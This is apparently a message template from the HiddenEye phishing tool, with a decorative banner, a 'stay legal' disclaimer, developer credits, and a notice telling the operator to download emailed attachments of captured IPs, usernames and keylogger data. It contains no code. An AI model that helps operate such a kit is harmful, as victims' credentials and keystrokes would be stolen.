Comments By : An0nud4y
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

           W I T H   G R E A T   P O W E R  
    
  C O M E S   G R E A T  R E S P O N S I B I L I T Y  

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
               S T A Y   L E G A L 
     (WE DO NOT SUPPORT ILLEGAL USE OF THE TOOL)     

REGARDS: (DARKSEC) 
[ https://github.com/darksecdevelopers ]

COMMENTS BY:(AN0NUD4Y) 
[ https://github.com/an0nud4y  ]
[ https://instagram.com/its_udy ]
____________________________________________________________               
               
      ......THANKS FOR USE HIDDENEYE......

DOWNLOAD ALL ATTACHMENTS TO GET YOUR CAPTURED DATA.

(ip.txt , usernames.txt , KeyloggerData.txt)

All Above three Files with be included in Email Attachments.


